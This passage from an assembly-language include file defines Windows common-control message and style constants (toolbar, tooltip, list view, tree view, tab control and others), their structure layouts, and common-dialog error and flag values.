TB_GETITEMRECT equ WM_USER+29
TB_BUTTONSTRUCTSIZE equ WM_USER+30
TB_SETBUTTONSIZE equ WM_USER+31
TB_SETBITMAPSIZE equ WM_USER+32
TB_AUTOSIZE equ WM_USER+33
TB_GETTOOLTIPS equ WM_USER+35
TB_SETTOOLTIPS equ WM_USER+36
TB_SETPARENT equ WM_USER+37
TB_SETROWS equ WM_USER+39
TB_GETROWS equ WM_USER+40
TB_SETCMDID equ WM_USER+42
TB_CHANGEBITMAP equ WM_USER+43
TB_GETBITMAP equ WM_USER+44
TB_GETBUTTONTEXT equ WM_USER+45
TB_GETBUTTONTEXTW equ WM_USER+75
TB_REPLACEBITMAP equ WM_USER+46
TBBF_LARGE equ 0001h
TB_GETBITMAPFLAGS equ WM_USER+41
TBN_GETBUTTONINFO equ TBN_FIRST-0
TBN_GETBUTTONINFOW equ TBN_FIRST-20
TBN_BEGINDRAG equ TBN_FIRST-1
TBN_ENDDRAG equ TBN_FIRST-2
TBN_BEGINADJUST equ TBN_FIRST-3
TBN_ENDADJUST equ TBN_FIRST-4
TBN_RESET equ TBN_FIRST-5
TBN_QUERYINSERT equ TBN_FIRST-6
TBN_QUERYDELETE equ TBN_FIRST-7
TBN_TOOLBARCHANGE equ TBN_FIRST-8
TBN_CUSTHELP equ TBN_FIRST-9
TTS_ALWAYSTIP equ 01h
TTS_NOPREFIX equ 02h
TTF_IDISHWND equ 01h
TTF_CENTERTIP equ 02h
TTF_RTLREADING equ 04h
TTF_SUBCLASS equ 10h
TTDT_AUTOMATIC equ 0
TTDT_RESHOW equ 1
TTDT_AUTOPOP equ 2
TTDT_INITIAL equ 3
TTM_ACTIVATE equ WM_USER+1
TTM_SETDELAYTIME equ WM_USER+3
TTM_ADDTOOL equ WM_USER+4
TTM_ADDTOOLW equ WM_USER+50
TTM_DELTOOL equ WM_USER+5
TTM_DELTOOLW equ WM_USER+51
TTM_NEWTOOLRECT equ WM_USER+6
TTM_NEWTOOLRECTW equ WM_USER+52
TTM_RELAYEVENT equ WM_USER+7
TTM_GETTOOLINFO equ WM_USER+8
TTM_GETTOOLINFOW equ WM_USER+53
TTM_SETTOOLINFO equ WM_USER+9
TTM_SETTOOLINFOW equ WM_USER+54
TTM_HITTEST equ WM_USER+10
TTM_HITTESTW equ WM_USER+55
TTM_GETTEXT equ WM_USER+11
TTM_GETTEXTW equ WM_USER+56
TTM_UPDATETIPTEXT equ WM_USER+12
TTM_UPDATETIPTEXTW equ WM_USER+57
TTM_GETTOOLCOUNT equ WM_USER+13
TTM_ENUMTOOLS equ WM_USER+14
TTM_ENUMTOOLSW equ WM_USER+58
TTM_GETCURRENTTOOL equ WM_USER+15
TTM_GETCURRENTTOOLW equ WM_USER+59
TTM_WINDOWFROMPOINT equ WM_USER+16
TTN_NEEDTEXT equ TTN_FIRST-0
TTN_NEEDTEXTW equ TTN_FIRST-10
TTN_SHOW equ TTN_FIRST-1
TTN_POP equ TTN_FIRST-2
SBARS_SIZEGRIP equ 0100h
SB_SETTEXT equ WM_USER+1
SB_SETTEXTW equ WM_USER+11
SB_GETTEXT equ WM_USER+2
SB_GETTEXTW equ WM_USER+13
SB_GETTEXTLENGTH equ WM_USER+3
SB_GETTEXTLENGTHW equ WM_USER+12
SB_SETPARTS equ WM_USER+4
SB_GETPARTS equ WM_USER+6
SB_GETBORDERS equ WM_USER+7
SB_SETMINHEIGHT equ WM_USER+8
SB_SIMPLE equ WM_USER+9
SB_GETRECT equ WM_USER+10
SBT_OWNERDRAW equ 1000h
SBT_NOBORDERS equ 0100h
SBT_POPOUT equ 0200h
SBT_RTLREADING equ 0400h
MINSYSCOMMAND equ SC_SIZE
TBS_AUTOTICKS equ 0001h
TBS_VERT equ 0002h
TBS_HORZ equ 0000h
TBS_TOP equ 0004h
TBS_BOTTOM equ 0000h
TBS_LEFT equ 0004h
TBS_RIGHT equ 0000h
TBS_BOTH equ 0008h
TBS_NOTICKS equ 0010h
TBS_ENABLESELRANGE equ 0020h
TBS_FIXEDLENGTH equ 0040h
TBS_NOTHUMB equ 0080h
TBM_GETPOS equ WM_USER
TBM_GETRANGEMIN equ WM_USER+1
TBM_GETRANGEMAX equ WM_USER+2
TBM_GETTIC equ WM_USER+3
TBM_SETTIC equ WM_USER+4
TBM_SETPOS equ WM_USER+5
TBM_SETRANGE equ WM_USER+6
TBM_SETRANGEMIN equ WM_USER+7
TBM_SETRANGEMAX equ WM_USER+8
TBM_CLEARTICS equ WM_USER+9
TBM_SETSEL equ WM_USER+10
TBM_SETSELSTART equ WM_USER+11
TBM_SETSELEND equ WM_USER+12
TBM_GETPTICS equ WM_USER+14
TBM_GETTICPOS equ WM_USER+15
TBM_GETNUMTICS equ WM_USER+16
TBM_GETSELSTART equ WM_USER+17
TBM_GETSELEND equ WM_USER+18
TBM_CLEARSEL equ WM_USER+19
TBM_SETTICFREQ equ WM_USER+20
TBM_SETPAGESIZE equ WM_USER+21
TBM_GETPAGESIZE equ WM_USER+22
TBM_SETLINESIZE equ WM_USER+23
TBM_GETLINESIZE equ WM_USER+24
TBM_GETTHUMBRECT equ WM_USER+25
TBM_GETCHANNELRECT equ WM_USER+26
TBM_SETTHUMBLENGTH equ WM_USER+27
TBM_GETTHUMBLENGTH equ WM_USER+28
TB_LINEUP equ 0
TB_LINEDOWN equ 1
TB_PAGEUP equ 2
TB_PAGEDOWN equ 3
TB_THUMBPOSITION equ 4
TB_THUMBTRACK equ 5
TB_TOP equ 6
TB_BOTTOM equ 7
TB_ENDTRACK equ 8
DL_BEGINDRAG equ WM_USER+133
DL_DRAGGING equ WM_USER+134
DL_DROPPED equ WM_USER+135
DL_CANCELDRAG equ WM_USER+136
DL_CURSORSET equ 0
DL_STOPCURSOR equ 1
DL_COPYCURSOR equ 2
DL_MOVECURSOR equ 3
UD_MAXVAL equ 7FFFh
UD_MINVAL equ -UD_MAXVAL
UDS_WRAP equ 0001h
UDS_SETBUDDYINT equ 0002h
UDS_ALIGNRIGHT equ 0004h
UDS_ALIGNLEFT equ 0008h
UDS_AUTOBUDDY equ 0010h
UDS_ARROWKEYS equ 0020h
UDS_HORZ equ 0040h
UDS_NOTHOUSANDS equ 0080h
UDM_SETRANGE equ WM_USER+101
UDM_GETRANGE equ WM_USER+102
UDM_SETPOS equ WM_USER+103
UDM_GETPOS equ WM_USER+104
UDM_SETBUDDY equ WM_USER+105
UDM_GETBUDDY equ WM_USER+106
UDM_SETACCEL equ WM_USER+107
UDM_GETACCEL equ WM_USER+108
UDM_SETBASE equ WM_USER+109
UDM_GETBASE equ WM_USER+110
UDN_DELTAPOS equ UDN_FIRST-1
PBM_SETRANGE equ WM_USER+1
PBM_SETPOS equ WM_USER+2
PBM_DELTAPOS equ WM_USER+3
PBM_SETSTEP equ WM_USER+4
PBM_STEPIT equ WM_USER+5
HOTKEYF_SHIFT equ 01h
HOTKEYF_CONTROL equ 02h
HOTKEYF_ALT equ 04h
HOTKEYF_EXT equ 08h
HKCOMB_NONE equ 0001h
HKCOMB_S equ 0002h
HKCOMB_C equ 0004h
HKCOMB_A equ 0008h
HKCOMB_SC equ 0010h
HKCOMB_SA equ 0020h
HKCOMB_CA equ 0040h
HKCOMB_SCA equ 0080h
HKM_SETHOTKEY equ WM_USER+1
HKM_GETHOTKEY equ WM_USER+2
HKM_SETRULES equ WM_USER+3
LVS_ICON equ 0000h
LVS_REPORT equ 0001h
LVS_SMALLICON equ 0002h
LVS_LIST equ 0003h
LVS_TYPEMASK equ 0003h
LVS_SINGLESEL equ 0004h
LVS_SHOWSELALWAYS equ 0008h
LVS_SORTASCENDING equ 0010h
LVS_SORTDESCENDING equ 0020h
LVS_SHAREIMAGELISTS equ 0040h
LVS_NOLABELWRAP equ 0080h
LVS_AUTOARRANGE equ 0100h
LVS_EDITLABELS equ 0200h
LVS_NOSCROLL equ 2000h
LVS_TYPESTYLEMASK equ 0fc00h
LVS_ALIGNTOP equ 0000h
LVS_ALIGNLEFT equ 0800h
LVS_ALIGNMASK equ 0c00h
LVS_OWNERDRAWFIXED equ 0400h
LVS_NOCOLUMNHEADER equ 4000h
LVS_NOSORTHEADER equ 8000h
LVM_GETBKCOLOR equ LVM_FIRST+0
LVM_SETBKCOLOR equ LVM_FIRST+1
LVM_GETIMAGELIST equ LVM_FIRST+2
LVSIL_NORMAL equ 0
LVSIL_SMALL equ 1
LVSIL_STATE equ 2
LVM_SETIMAGELIST equ LVM_FIRST+3
LVM_GETITEMCOUNT equ LVM_FIRST+4
LVIF_TEXT equ 0001h
LVIF_IMAGE equ 0002h
LVIF_PARAM equ 0004h
LVIF_STATE equ 0008h
LVIS_FOCUSED equ 0001h
LVIS_SELECTED equ 0002h
LVIS_CUT equ 0004h
LVIS_DROPHILITED equ 0008h
LVIS_OVERLAYMASK equ 0F00h
LVIS_STATEIMAGEMASK equ 0F000h
LPSTR_TEXTCALLBACKW equ -1
LPSTR_TEXTCALLBACK equ -1
I_IMAGECALLBACK equ -1
LVM_GETITEM equ LVM_FIRST+5
LVM_GETITEMW equ LVM_FIRST+75
LVM_SETITEM equ LVM_FIRST+6
LVM_SETITEMW equ LVM_FIRST+76
LVM_INSERTITEM equ LVM_FIRST+7
LVM_INSERTITEMW equ LVM_FIRST+77
LVM_DELETEITEM equ LVM_FIRST+8
LVM_DELETEALLITEMS equ LVM_FIRST+9
LVM_GETCALLBACKMASK equ LVM_FIRST+10
LVM_SETCALLBACKMASK equ LVM_FIRST+11
LVNI_ALL equ 0000h
LVNI_FOCUSED equ 0001h
LVNI_SELECTED equ 0002h
LVNI_CUT equ 0004h
LVNI_DROPHILITED equ 0008h
LVNI_ABOVE equ 0100h
LVNI_BELOW equ 0200h
LVNI_TOLEFT equ 0400h
LVNI_TORIGHT equ 0800h
LVM_GETNEXTITEM equ LVM_FIRST+12
LVFI_PARAM equ 0001h
LVFI_STRING equ 0002h
LVFI_PARTIAL equ 0008h
LVFI_WRAP equ 0020h
LVFI_NEARESTXY equ 0040h
LVM_FINDITEM equ LVM_FIRST+13
LVM_FINDITEMW equ LVM_FIRST+83
LVIR_BOUNDS equ 0
LVIR_ICON equ 1
LVIR_LABEL equ 2
LVIR_SELECTBOUNDS equ 3
LVM_GETITEMRECT equ LVM_FIRST+14
LVM_SETITEMPOSITION equ LVM_FIRST+15
LVM_GETITEMPOSITION equ LVM_FIRST+16
LVM_GETSTRINGWIDTH equ LVM_FIRST+17
LVM_GETSTRINGWIDTHW equ LVM_FIRST+87
LVHT_NOWHERE equ 0001h
LVHT_ONITEMICON equ 0002h
LVHT_ONITEMLABEL equ 0004h
LVHT_ONITEMSTATEICON equ 0008h
LVHT_ONITEM equ LVHT_ONITEMICON|LVHT_ONITEMLABEL|LVHT_ONITEMSTATEICON
LVHT_ABOVE equ 0008h
LVHT_BELOW equ 0010h
LVHT_TORIGHT equ 0020h
LVHT_TOLEFT equ 0040h
LVM_HITTEST equ LVM_FIRST+18
LVM_ENSUREVISIBLE equ LVM_FIRST+19
LVM_SCROLL equ LVM_FIRST+20
LVM_REDRAWITEMS equ LVM_FIRST+21
LVA_DEFAULT equ 0000h
LVA_ALIGNLEFT equ 0001h
LVA_ALIGNTOP equ 0002h
LVA_SNAPTOGRID equ 0005h
LVM_ARRANGE equ LVM_FIRST+22
LVM_EDITLABEL equ LVM_FIRST+23
LVM_EDITLABELW equ LVM_FIRST+118
LVM_GETEDITCONTROL equ LVM_FIRST+24
LVCF_FMT equ 0001h
LVCF_WIDTH equ 0002h
LVCF_TEXT equ 0004h
LVCF_SUBITEM equ 0008h
LVCFMT_LEFT equ 0000h
LVCFMT_RIGHT equ 0001h
LVCFMT_CENTER equ 0002h
LVCFMT_JUSTIFYMASK equ 0003h
LVM_GETCOLUMN equ LVM_FIRST+25
LVM_GETCOLUMNW equ LVM_FIRST+95
LVM_SETCOLUMN equ LVM_FIRST+26
LVM_SETCOLUMNW equ LVM_FIRST+96
LVM_INSERTCOLUMN equ LVM_FIRST+27
LVM_INSERTCOLUMNW equ LVM_FIRST+97
LVM_DELETECOLUMN equ LVM_FIRST+28
LVM_GETCOLUMNWIDTH equ LVM_FIRST+29
LVSCW_AUTOSIZE equ -1
LVSCW_AUTOSIZE_USEHEADER equ -2
LVM_SETCOLUMNWIDTH equ LVM_FIRST+30
LVM_CREATEDRAGIMAGE equ LVM_FIRST+33
LVM_GETVIEWRECT equ LVM_FIRST+34
LVM_GETTEXTCOLOR equ LVM_FIRST+35
LVM_SETTEXTCOLOR equ LVM_FIRST+36
LVM_GETTEXTBKCOLOR equ LVM_FIRST+37
LVM_SETTEXTBKCOLOR equ LVM_FIRST+38
LVM_GETTOPINDEX equ LVM_FIRST+39
LVM_GETCOUNTPERPAGE equ LVM_FIRST+40
LVM_GETORIGIN equ LVM_FIRST+41
LVM_UPDATE equ LVM_FIRST+42
LVM_SETITEMSTATE equ LVM_FIRST+43
LVM_GETITEMSTATE equ LVM_FIRST+44
LVM_GETITEMTEXT equ LVM_FIRST+45
LVM_GETITEMTEXTW equ LVM_FIRST+115
LVM_SETITEMTEXT equ LVM_FIRST+46
LVM_SETITEMTEXTW equ LVM_FIRST+116
LVM_SETITEMCOUNT equ LVM_FIRST+47
LVM_SORTITEMS equ LVM_FIRST+48
LVM_SETITEMPOSITION32 equ LVM_FIRST+49
LVM_GETSELECTEDCOUNT equ LVM_FIRST+50
LVM_GETITEMSPACING equ LVM_FIRST+51
LVM_GETISEARCHSTRING equ LVM_FIRST+52
LVM_GETISEARCHSTRINGW equ LVM_FIRST+117
LVN_ITEMCHANGING equ LVN_FIRST-0
LVN_ITEMCHANGED equ LVN_FIRST-1
LVN_INSERTITEM equ LVN_FIRST-2
LVN_DELETEITEM equ LVN_FIRST-3
LVN_DELETEALLITEMS equ LVN_FIRST-4
LVN_BEGINLABELEDIT equ LVN_FIRST-5
LVN_BEGINLABELEDITW equ LVN_FIRST-75
LVN_ENDLABELEDIT equ LVN_FIRST-6
LVN_ENDLABELEDITW equ LVN_FIRST-76
LVN_COLUMNCLICK equ LVN_FIRST-8
LVN_BEGINDRAG equ LVN_FIRST-9
LVN_BEGINRDRAG equ LVN_FIRST-11
LVN_GETDISPINFO equ LVN_FIRST-50
LVN_GETDISPINFOW equ LVN_FIRST-77
LVN_SETDISPINFO equ LVN_FIRST-51
LVN_SETDISPINFOW equ LVN_FIRST-78
LVIF_DI_SETITEM equ 1000h
LVN_KEYDOWN equ LVN_FIRST-55
TVS_HASBUTTONS equ 0001h
TVS_HASLINES equ 0002h
TVS_LINESATROOT equ 0004h
TVS_EDITLABELS equ 0008h
TVS_DISABLEDRAGDROP equ 0010h
TVS_SHOWSELALWAYS equ 0020h
TVIF_TEXT equ 0001h
TVIF_IMAGE equ 0002h
TVIF_PARAM equ 0004h
TVIF_STATE equ 0008h
TVIF_HANDLE equ 0010h
TVIF_SELECTEDIMAGE equ 0020h
TVIF_CHILDREN equ 0040h
TVIS_FOCUSED equ 0001h
TVIS_SELECTED equ 0002h
TVIS_CUT equ 0004h
TVIS_DROPHILITED equ 0008h
TVIS_BOLD equ 0010h
TVIS_EXPANDED equ 0020h
TVIS_EXPANDEDONCE equ 0040h
TVIS_OVERLAYMASK equ 0F00h
TVIS_STATEIMAGEMASK equ 0F000h
TVIS_USERMASK equ 0F000h
I_CHILDRENCALLBACK equ -1
TVI_ROOT equ 0FFFF0000h
TVI_FIRST equ 0FFFF0001h
TVI_LAST equ 0FFFF0002h
TVI_SORT equ 0FFFF0003h
TVM_INSERTITEM equ TV_FIRST+0
TVM_INSERTITEMW equ TV_FIRST+50
TVM_DELETEITEM equ TV_FIRST+1
TVM_EXPAND equ TV_FIRST+2
TVE_COLLAPSE equ 0001h
TVE_EXPAND equ 0002h
TVE_TOGGLE equ 0003h
TVE_COLLAPSERESET equ 8000h
TVM_GETITEMRECT equ TV_FIRST+4
TVM_GETCOUNT equ TV_FIRST+5
TVM_GETINDENT equ TV_FIRST+6
TVM_SETINDENT equ TV_FIRST+7
TVM_GETIMAGELIST equ TV_FIRST+8
TVSIL_NORMAL equ 0
TVSIL_STATE equ 2
TVM_SETIMAGELIST equ TV_FIRST+9
TVM_GETNEXTITEM equ TV_FIRST+10
TVGN_ROOT equ 0000h
TVGN_NEXT equ 0001h
TVGN_PREVIOUS equ 0002h
TVGN_PARENT equ 0003h
TVGN_CHILD equ 0004h
TVGN_FIRSTVISIBLE equ 0005h
TVGN_NEXTVISIBLE equ 0006h
TVGN_PREVIOUSVISIBLE equ 0007h
TVGN_DROPHILITE equ 0008h
TVGN_CARET equ 0009h
TVM_SELECTITEM equ TV_FIRST+11
TVM_GETITEM equ TV_FIRST+12
TVM_GETITEMW equ TV_FIRST+62
TVM_SETITEM equ TV_FIRST+13
TVM_SETITEMW equ TV_FIRST+63
TVM_EDITLABEL equ TV_FIRST+14
TVM_EDITLABELW equ TV_FIRST+65
TVM_GETEDITCONTROL equ TV_FIRST+15
TVM_GETVISIBLECOUNT equ TV_FIRST+16
TVM_HITTEST equ TV_FIRST+17
TVHT_NOWHERE equ 0001h
TVHT_ONITEMICON equ 0002h
TVHT_ONITEMLABEL equ 0004h
TVHT_ONITEMSTATEICON equ 0040h
TVHT_ONITEM equ TVHT_ONITEMICON|TVHT_ONITEMLABEL|TVHT_ONITEMSTATEICON
TVHT_ONITEMINDENT equ 0008h
TVHT_ONITEMBUTTON equ 0010h
TVHT_ONITEMRIGHT equ 0020h
TVHT_ABOVE equ 0100h
TVHT_BELOW equ 0200h
TVHT_TORIGHT equ 0400h
TVHT_TOLEFT equ 0800h
TVM_CREATEDRAGIMAGE equ TV_FIRST+18
TVM_SORTCHILDREN equ TV_FIRST+19
TVM_ENSUREVISIBLE equ TV_FIRST+20
TVM_SORTCHILDRENCB equ TV_FIRST+21
TVM_ENDEDITLABELNOW equ TV_FIRST+22
TVM_GETISEARCHSTRING equ TV_FIRST+23
TVM_GETISEARCHSTRINGW equ TV_FIRST+64
TVN_SELCHANGINGA equ TVN_FIRST-1
TVN_SELCHANGINGW equ TVN_FIRST-50
TVN_SELCHANGEDA equ TVN_FIRST-2
TVN_SELCHANGEDW equ TVN_FIRST-51
TVC_UNKNOWN equ 0000h
TVC_BYMOUSE equ 0001h
TVC_BYKEYBOARD equ 0002h
TVN_GETDISPINFOA equ TVN_FIRST-3
TVN_GETDISPINFOW equ TVN_FIRST-52
TVN_SETDISPINFOA equ TVN_FIRST-4
TVN_SETDISPINFOW equ TVN_FIRST-53
TVIF_DI_SETITEM equ 1000h
TVN_ITEMEXPANDING equ TVN_FIRST-5
TVN_ITEMEXPANDINGW equ TVN_FIRST-54
TVN_ITEMEXPANDED equ TVN_FIRST-6
TVN_ITEMEXPANDEDW equ TVN_FIRST-55
TVN_BEGINDRAG equ TVN_FIRST-7
TVN_BEGINDRAGW equ TVN_FIRST-56
TVN_BEGINRDRAG equ TVN_FIRST-8
TVN_BEGINRDRAGW equ TVN_FIRST-57
TVN_DELETEITEM equ TVN_FIRST-9
TVN_DELETEITEMW equ TVN_FIRST-58
TVN_BEGINLABELEDIT equ TVN_FIRST-10
TVN_BEGINLABELEDITW equ TVN_FIRST-59
TVN_ENDLABELEDIT equ TVN_FIRST-11
TVN_ENDLABELEDITW equ TVN_FIRST-60
TVN_KEYDOWN equ TVN_FIRST-12
TCS_FORCEICONLEFT equ 0010h
TCS_FORCELABELLEFT equ 0020h
TCS_TABS equ 0000h
TCS_BUTTONS equ 0100h
TCS_SINGLELINE equ 0000h
TCS_MULTILINE equ 0200h
TCS_RIGHTJUSTIFY equ 0000h
TCS_FIXEDWIDTH equ 0400h
TCS_RAGGEDRIGHT equ 0800h
TCS_FOCUSONBUTTONDOWN equ 1000h
TCS_OWNERDRAWFIXED equ 2000h
TCS_TOOLTIPS equ 4000h
TCS_FOCUSNEVER equ 8000h
TCM_FIRST equ 1300h
TCM_GETIMAGELIST equ TCM_FIRST+2
TCM_SETIMAGELIST equ TCM_FIRST+3
TCM_GETITEMCOUNT equ TCM_FIRST+4
TCIF_TEXT equ 0001h
TCIF_IMAGE equ 0002h
TCIF_RTLREADING equ 0004h
TCIF_PARAM equ 0008h
TCM_GETITEM equ TCM_FIRST+5
TCM_SETITEM equ TCM_FIRST+6
TCM_SETITEMW equ TCM_FIRST+61
TCM_INSERTITEM equ TCM_FIRST+7
TCM_INSERTITEMW equ TCM_FIRST+62
TCM_DELETEITEM equ TCM_FIRST+8
TCM_DELETEALLITEMS equ TCM_FIRST+9
TCM_GETITEMRECT equ TCM_FIRST+10
TCM_GETCURSEL equ TCM_FIRST+11
TCM_SETCURSEL equ TCM_FIRST+12
TCHT_NOWHERE equ 0001h
TCHT_ONITEMICON equ 0002h
TCHT_ONITEMLABEL equ 0004h
TCHT_ONITEM equ TCHT_ONITEMICON|TCHT_ONITEMLABEL
TCM_HITTEST equ TCM_FIRST+13
TCM_SETITEMEXTRA equ TCM_FIRST+14
TCM_ADJUSTRECT equ TCM_FIRST+40
TCM_SETITEMSIZE equ TCM_FIRST+41
TCM_REMOVEIMAGE equ TCM_FIRST+42
TCM_SETPADDING equ TCM_FIRST+43
TCM_GETROWCOUNT equ TCM_FIRST+44
TCM_GETTOOLTIPS equ TCM_FIRST+45
TCM_SETTOOLTIPS equ TCM_FIRST+46
TCM_GETCURFOCUS equ TCM_FIRST+47
TCM_SETCURFOCUS equ TCM_FIRST+48
TCN_KEYDOWN equ TCN_FIRST-0
TCN_SELCHANGE equ TCN_FIRST-1
TCN_SELCHANGING equ TCN_FIRST-2
ACS_CENTER equ 0001h
ACS_TRANSPARENT equ 0002h
ACS_AUTOPLAY equ 0004h
ACM_OPEN equ WM_USER+100
ACM_OPENW equ WM_USER+103
ACM_PLAY equ WM_USER+101
ACM_STOP equ WM_USER+102
ACN_START equ 1
ACN_STOP equ 2
;-------------------------comctl structures------------------------------
STRUC INIT_COMMON_CONTROLSEX
.dwSize RESD 1
.dwICC RESD 1
ENDSTRUC
STRUC REBARINFO
.cbSize RESD 1
.fMask RESD 1
.himl RESD 1
ENDSTRUC
STRUC REBARBANDINFO
.cbSize RESD 1
.fMask RESD 1
.fStyle RESD 1
.clrFore RESD 1
.clrBack RESD 1
.lpText RESD 1
.cch RESD 1
.iImage RESD 1
.hwndChild RESD 1
.cxMinChild RESD 1
.cyMinChild RESD 1
.lx RESD 1
.hbmBack RESD 1
.wID RESD 1
.cyChild RESD 1
.cyMaxChild RESD 1
.cyIntegral RESD 1
.cxIdeal RESD 1
.lParam RESD 1
.cxHeader RESD 1
ENDSTRUC
STRUC NMREBARCHILDSIZE
.hdr RESB NMHDR_size
.uBand RESD 1
.wID RESD 1
.rcChild RESB RECT_size
.rcBand RESB RECT_size
ENDSTRUC
STRUC NMREBAR
.hdr RESB NMHDR_size
.dwMask RESD 1
.uBand RESD 1
.fStyle RESD 1
.wID RESD 1
.lParam RESD 1
ENDSTRUC
STRUC NMRBAUTOSIZE
.hdr RESB NMHDR_size
.fChanged RESD 1
.rcTarget RESB RECT_size
.rcActual RESB RECT_size
ENDSTRUC
STRUC RB_HITTESTINFO
.pt RESB POINT_size
.flags RESD 1
.iBand RESW 1
ENDSTRUC
STRUC IMAGEINFO
.hbmImage RESD 1
.hbmMask RESD 1
.Unused1 RESD 1
.Unused2 RESD 1
.rcImage RESB RECT_size
ENDSTRUC
STRUC HD_ITEM
.imask RESD 1
.lxy RESD 1
.pszText RESD 1
.hbm RESD 1
.cchTextMax RESD 1
.fmt RESD 1
.lParam RESD 1
ENDSTRUC
STRUC HD_LAYOUT
.prc RESD 1
.pwpos RESD 1
ENDSTRUC
STRUC HD_HITTESTINFO
.pt RESB POINT_size
.flags RESD 1
.iItem RESD 1
ENDSTRUC
STRUC HD_NOTIFY
.hdr RESB NMHDR_size
.iItem RESD 1
.iButton RESD 1
.pitem RESD 1
ENDSTRUC
STRUC TBBUTTON
.iBitmap RESD 1
.idCommand RESD 1
.fsState RESB 1
.fsStyle RESB 1
.dwData RESD 1
.iString RESD 1
ENDSTRUC
STRUC ColorMap
.cmFrom RESD 1
.cmTo RESD 1
ENDSTRUC
STRUC TBADDBITMAP
.hInst RESD 1
.nId RESD 1
ENDSTRUC
STRUC TBSAVEPARAMS
.hkr RESD 1
.pszSubKey RESD 1
.pszValueName RESD 1
ENDSTRUC
STRUC TBREPLACEBITMAP
.hInstOld RESD 1
.nIdOld RESD 1
.hInstNew RESD 1
.nIdNew RESD 1
.nButtons RESD 1
ENDSTRUC
STRUC TBNOTIFY
.hdr RESB NMHDR_size
.iItem RESD 1
.tbButton RESB TBBUTTON_size
.cchText RESD 1
.pszText RESD 1
ENDSTRUC
STRUC TOOLINFO
.cbSize RESD 1
.uFlags RESD 1
.hWnd RESD 1
.uId RESD 1
.rect RESB RECT_size
.hInst RESD 1
.lpszText RESD 1
.lParam RESD 1
ENDSTRUC
STRUC TT_HITTESTINFO
.hWnd RESD 1
.pt RESB POINT_size
.ti RESB TOOLINFO_size
ENDSTRUC
STRUC TOOLTIPTEXT
.hdr RESB NMHDR_size
.lpszText RESD 1
.szText RESB 80
.hInst RESD 1
.uFlags RESD 1
ENDSTRUC
STRUC DRAGLISTINFO
.uNotification RESD 1
.hWnd RESD 1
.ptCursor RESB POINT_size
ENDSTRUC
STRUC UDACCEL
.nSec RESD 1
.nInc RESD 1
ENDSTRUC
STRUC NM_UPDOWN
.hdr RESB NMHDR_size
.iPos RESD 1
.iDelta RESD 1
ENDSTRUC
STRUC LV_ITEM
.imask RESD 1
.iItem RESD 1
.iSubItem RESD 1
.state RESD 1
.stateMask RESD 1
.pszText RESD 1
.cchTextMax RESD 1
.iImage RESD 1
.lParam RESD 1
ENDSTRUC
STRUC LV_FINDINFO
.flags RESD 1
.psz RESD 1
.lParam RESD 1
.pt RESB POINT_size
.vkDirection RESD 1
ENDSTRUC
STRUC LV_HITTESTINFO
.pt RESB POINT_size
.flags RESD 1
.iItem RESD 1
ENDSTRUC
STRUC LV_COLUMN
.imask RESD 1
.fmt RESD 1
.lx RESD 1
.pszText RESD 1
.cchTextMax RESD 1
.iSubItem RESD 1
ENDSTRUC
STRUC NM_LISTVIEW
.hdr RESB NMHDR_size
.iItem RESD 1
.iSubItem RESD 1
.uNewState RESD 1
.uOldState RESD 1
.uChanged RESD 1
.ptAction RESB POINT_size
.lParam RESD 1
ENDSTRUC
STRUC LV_DISPINFO
.hdr RESB NMHDR_size
.item RESD 1
ENDSTRUC
STRUC LV_KEYDOWN
.hdr RESB NMHDR_size
.wVKey RESW 1
.flags RESD 1
ENDSTRUC
STRUC TREEITEM
.dummy RESD 1
ENDSTRUC
STRUC TV_ITEM
.imask RESD 1
.hItem RESD 1
.state RESD 1
.stateMask RESD 1
.pszText RESD 1
.cchTextMax RESD 1
.iImage RESD 1
.iSelectedImage RESD 1
.cChildren RESD 1
.lParam RESD 1
ENDSTRUC
STRUC TV_INSERTSTRUCT
.hParent RESD 1
.hInsertAfter RESD 1
.item RESD 1
ENDSTRUC
STRUC TV_HITTESTINFO
.pt RESB POINT_size
.flags RESD 1
.hItem RESD 1
ENDSTRUC
STRUC TV_SORTCB
.hParent RESD 1
.lpfnCompare RESD 1
.lParam RESD 1
ENDSTRUC
STRUC NM_TREEVIEW
.hdr RESB NMHDR_size
.action RESD 1
.itemOld RESD 1
.itemNew RESD 1
.ptDrag RESB POINT_size
ENDSTRUC
STRUC TV_DISPINFO
.hdr RESB NMHDR_size
.item RESD 1
ENDSTRUC
STRUC TV_KEYDOWN
.hdr RESB NMHDR_size
.wVKey RESW 1
.flags RESD 1
ENDSTRUC
STRUC TC_ITEMHEADER
.imask RESD 1
.lpReserved1 RESD 1
.lpReserved2 RESD 1
.pszText RESD 1
.cchTextMax RESD 1
.iImage RESD 1
ENDSTRUC
STRUC TC_ITEM
.imask RESD 1
.lpReserved1 RESD 1
.lpReserved2 RESD 1
.pszText RESD 1
.cchTextMax RESD 1
.iImage RESD 1
.lParam RESD 1
ENDSTRUC
STRUC TC_HITTESTINFO
.pt RESB POINT_size
.flags RESD 1
ENDSTRUC
STRUC TC_KEYDOWN
.hdr RESB NMHDR_size
.wVKey RESW 1
.flags RESD 1
ENDSTRUC
;--------------------------comdlg equates-------------------------------
CDERR_GENERALCODES equ 0000h
CDERR_STRUCTSIZE equ 0001h
CDERR_INITIALIZATION equ 0002h
CDERR_NOTEMPLATE equ 0003h
CDERR_NOHINSTANCE equ 0004h
CDERR_LOADSTRFAILURE equ 0005h
CDERR_FINDRESFAILURE equ 0006h
CDERR_LOADRESFAILURE equ 0007h
CDERR_LOCKRESFAILURE equ 0008h
CDERR_MEMALLOCFAILURE equ 0009h
CDERR_MEMLOCKFAILURE equ 000Ah
CDERR_NOHOOK equ 000Bh
CDERR_REGISTERMSGFAIL equ 000Ch
CC_RGBINIT equ 00000001h
CC_FULLOPEN equ 00000002h
CC_PREVENTFULLOPEN equ 00000004h
CC_SHOWHELP equ 00000008h
CC_ENABLEHOOK equ 00000010h
CC_ENABLETEMPLATE equ 00000020h
CC_ENABLETEMPLATEHANDLE equ 00000040h
CCERR_CHOOSECOLORCODES equ 5000h
FR_DOWN equ 00000001h
FR_WHOLEWORD equ 00000002h
FR_MATCHCASE equ 00000004h
FR_FINDNEXT equ 00000008h
FR_REPLACE equ 00000010h
FR_REPLACEALL equ 00000020h
FR_DIALOGTERM equ 00000040h
FR_SHOWHELP equ 00000080h
FR_ENABLEHOOK equ 00000100h
FR_ENABLETEMPLATE equ 00000200h
FR_NOUPDOWN equ 00000400h
FR_NOMATCHCASE equ 00000800h
FR_NOWHOLEWORD equ 00001000h
FR_ENABLETEMPLATEHANDLE equ 00002000h
FR_HIDEUPDOWN equ 00004000h
FR_HIDEMATCHCASE equ 00008000h
